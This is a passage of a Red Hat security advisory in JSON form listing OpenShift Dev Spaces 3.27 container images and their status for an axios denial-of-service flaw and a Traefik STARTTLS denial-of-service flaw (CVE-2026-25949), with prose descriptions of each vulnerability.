"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25949",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-02-12T21:01:13.761844+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439522"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Traefik, an HTTP reverse proxy and load balancer. An unauthenticated client can exploit this vulnerability by sending a specific 8-byte Postgres SSLRequest (STARTTLS) prelude and then intentionally delaying further communication. This action bypasses Traefik\u0027s configured read timeouts, causing connections to remain open indefinitely. The primary consequence is a Denial of Service, as the server\u0027s resources become exhausted by these persistent, non-responsive connections.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/traefik/traefik: Traefik: Denial of Service via stalled STARTTLS requests",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an IMPORTANT denial of service flaw in Traefik, an HTTP reverse proxy and load balancer, affecting Red Hat OpenShift Dev Spaces. An unauthenticated client can exploit this by sending a specific STARTTLS request and then stalling, which bypasses configured read timeouts and causes connections to remain open indefinitely, leading to resource exhaustion.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
